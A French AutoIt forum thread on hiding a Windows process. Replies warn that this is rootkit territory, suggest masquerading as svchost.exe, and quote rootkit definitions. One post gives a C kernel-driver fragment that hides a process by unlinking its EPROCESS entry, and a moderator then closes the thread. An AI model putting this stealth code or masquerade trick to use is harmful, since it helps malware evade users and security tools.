Bonjour;
comment cacher un processus sous windows ?
Merci d'avance.
[C] Processus caché
Règles du forum
- Merci de consulter la section "Règles du forum" et plus particulièrement "Règles et Mentions Légales du site autoitscript.fr" avant d'écrire un message.
[C] Processus caché
Le partage fait l'union
Re: [..] Processus caché
Bonsoir,
ce sujet à fait beaucoup de sujet sur le forum anglais petit exemple de sujet :
http://www.autoitscript.com/forum/index ... de+Process
Je n'ai pas chercher plus loin mais il me semble que :
ce n'est pas simple
que cacher un processus c'est soit pour faire un bot soit un virus
et enfin que le plus simple est encore de nommer son script svchost.exe
ce sujet à fait beaucoup de sujet sur le forum anglais petit exemple de sujet :
http://www.autoitscript.com/forum/index ... de+Process
Je n'ai pas chercher plus loin mais il me semble que :
ce n'est pas simple
que cacher un processus c'est soit pour faire un bot soit un virus
et enfin que le plus simple est encore de nommer son script svchost.exe
Re: [..] Processus caché
Si tu fait ça, on appel cela un ROOTKIT, c'est du piratage, et ça c'est pas bien 
Tu peut chercher sur google pour rootkit mais à tes risques et périls
Tu peut chercher sur google pour rootkit mais à tes risques et périls
Re: [..] Processus caché
definition wikipedia : On nomme rootkit un programme ou ensemble de programmes permettant à un tiers (un pirate informatique, par exemple, mais pas nécessairement) de maintenir - dans le temps - un accès frauduleux à un système informatique. Le pré-requis du rootkit est une machine déjà compromise.
si l utilisateur est prevenu de l installation d un tel systeme sur son poste, ce n'est plus forcement un rootkit, il est egalement tout a fait possible de faire un soft qui ne se lance que lorsqu on a besoin.
si l utilisateur est prevenu de l installation d un tel systeme sur son poste, ce n'est plus forcement un rootkit, il est egalement tout a fait possible de faire un soft qui ne se lance que lorsqu on a besoin.
Re: [..] Processus caché
Rootkit
Les rootkits sont une variété de malwares (disons pour simplifier, virus) apparue d'abord dans le monde Unix/Linux puis, plus récemment, dans celui de Windows.
Les rootkits sont des malwares qui peuvent être très difficiles à démasquer et parfois, à éradiquer. En effet ils possèdent deux caractéristiques originales :
- d'une part ils modifient en profondeur le fonctionnement du système d'exploitation (éventuellement son noyau) ;
-d'autre part ils se rendent invisibles à ce système d'exploitation.
Ils peuvent même rendre invisibles divers autres parasites qu'ils auront installés : spyware, portes dérobée, cheval de Troie... et c'est ce qui constitue en général la raison majeure de leur existence.
http://www.futura-sciences.com/fr/defin ... tkit_4030/
Et pour wiki :
Un «rootkit» a pour but principal la furtivité, il permet par exemple de cacher certains processus, certains fichiers et clefs de registre, etc. Il opère au niveau du noyau (la plupart du temps chargé en tant que driver) et peut donc tromper à sa guise les programmes qui sont exécutés en mode utilisateur (antivirus, firewalls). Le rootkit est souvent couplé à d'autres programmes tel qu'un sniffeur de frappe, de paquets...
Les rootkits sont une variété de malwares (disons pour simplifier, virus) apparue d'abord dans le monde Unix/Linux puis, plus récemment, dans celui de Windows.
Les rootkits sont des malwares qui peuvent être très difficiles à démasquer et parfois, à éradiquer. En effet ils possèdent deux caractéristiques originales :
- d'une part ils modifient en profondeur le fonctionnement du système d'exploitation (éventuellement son noyau) ;
-d'autre part ils se rendent invisibles à ce système d'exploitation.
Ils peuvent même rendre invisibles divers autres parasites qu'ils auront installés : spyware, portes dérobée, cheval de Troie... et c'est ce qui constitue en général la raison majeure de leur existence.
http://www.futura-sciences.com/fr/defin ... tkit_4030/
Et pour wiki :
Un «rootkit» a pour but principal la furtivité, il permet par exemple de cacher certains processus, certains fichiers et clefs de registre, etc. Il opère au niveau du noyau (la plupart du temps chargé en tant que driver) et peut donc tromper à sa guise les programmes qui sont exécutés en mode utilisateur (antivirus, firewalls). Le rootkit est souvent couplé à d'autres programmes tel qu'un sniffeur de frappe, de paquets...
Re: [..] Processus caché
Bonjour
Code en c pour cacher processus à convertir en Autoit
Code en c pour cacher processus à convertir en Autoit
Code : Tout sélectionner
01 if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){ //get EPROCESSstruct for the process we want to hide
02 DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
03 DbgPrint("Now hiding process %d...\n", hps->uPid);
04 dwEProcAddr = (ULONG) pEProc; //get address of process's EPROCESS struct
05 __try{ //try/except just in case, so we don't get a BSOD
06 pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset); //pListProcs is a LIST_ENTRY struct, which is set to the LIST_ENTRY struct
07 //in the process being hidden (uLinkOffset varies between 2k and XP)
08 *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink); //set flink of prev proc to flink of cur proc
09 *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
10 pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
11 pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
12 DbgPrint("Process now hidden.\n");
13 }__except(EXCEPTION_EXECUTE_HANDLER){
14 NtStatus = GetExceptionCode();
15 DbgPrint("Exception: %d.\n", NtStatus);
16 }
17 NtStatus = STATUS_SUCCESS;
18 }-
mikell
- Spammer !
- Messages : 6292
- Enregistré le : dim. 29 mai 2011 17:32
- Localisation : Deep Cévennes
- Status : Hors ligne
Re: [..] Processus caché
Exemple-type du post totalement inutile
Un bout de code en C sans mention des includes et bibliothèques sur une exhumation d'un sujet vieux de + de 4 ans
En plus ledit sujet a un petit quelque chose de glauque
Donc on ferme
Un bout de code en C sans mention des includes et bibliothèques sur une exhumation d'un sujet vieux de + de 4 ans
En plus ledit sujet a un petit quelque chose de glauque
Donc on ferme
" L'échec est le fondement de la réussite. " (Lao-Tseu )
" Plus ça rate, plus on a de chances que ça marche " (les Shadoks )
" Plus ça rate, plus on a de chances que ça marche " (les Shadoks )